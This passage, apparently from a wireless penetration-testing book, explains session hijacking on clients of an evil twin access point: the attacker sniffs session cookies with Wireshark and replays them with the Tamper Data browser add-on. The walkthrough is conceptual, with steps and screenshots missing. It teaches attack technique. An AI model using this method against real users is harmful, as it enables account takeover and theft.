Session hijacking is a technique that's used to gain unauthorized access to information or an account by exploiting a valid computer session. Sometimes, it is also referred to as cookie hijacking as cookies are often used to track the user session. By stealing a cookie from the client session, an attacker can spoof the client and perform activities on behalf of the legitimate client.
When a user attempts to access a domain, they are prompted to authenticate to a protected resource. After a successful login with a valid username and password, the web server assigns a unique value to the client to track the user. The unique value is sometimes called session cookie. This session cookie is created by the web server and placed on the client. While this client is communicating with the web server during this session, this cookie information will continue to be used. An attacker positioned between the client and the web server, such as the interface off of our access point, is able to sniff the traffic and can extract the session cookies. This could allow the attacker to impersonate the client and interact with the web application even without having direct knowledge of the username and password.
To demonstrate how session hijacking occurs, let's suppose that the victim is accessing http://infosecawareness.in, where he will be logging in with his credentials in order to gain access to the website. On successful login, a cookie is created for the session and is used to track the user. If the attacker can extract the cookie from the HTTP session, it can be used to hijack the session and perform activities on the target website without the knowledge of the user. While this session is being established, all of the session data will be passing through the attacker machine and can be seen in Wireshark by the attacker. The attacker can now extract the cookies sent by your browser in plain text and can take over the session between your browser and web server.
Once the user session is hijacked, the attacker can potentially change the user's password, post comments on behalf of the user, or update the user profile. If the website that the user is visiting is the administrative console of an infrastructure device, the attacker can also download or change the configuration, which can lead to further compromise of the network.
In this section, we will perform session hijacking on clients connected to our evil twin access point. Once a user session is compromised, we will extract useful information which will help us further penetrate the network. The prerequisite for this attack requires that we are in the path of the client traffic once again. There are several ways to accomplish this, as discussed previously in this chapter, including either Hostapd or airbase-ng.
In this example, we will sniff the data traffic using Wireshark and extract cookies to access the user session from the attacker machine. We will also use Tamper Data, an add-in to Firefox, which can be used to capture, alter, and replay HTTP requests. Follow these steps:
#wireshark
You should be able to see the following screenshot:
infosecawareness.in/@@personal-preferences
in the address bar of the web browser. You will be prompted by Tamper Data to modify the request content; when prompted, click on the Tamper button.We have also seen how this type of attack can potentially be utilized on certain administrative interfaces to bypass user authentication.
The following screenshot is the hijacked session displayed in the attacker's machine:
The attacker has successfully logged in to the website by just hijacking the user session. Now he has the ability to change the password or perform malicious activities on the logged-in account.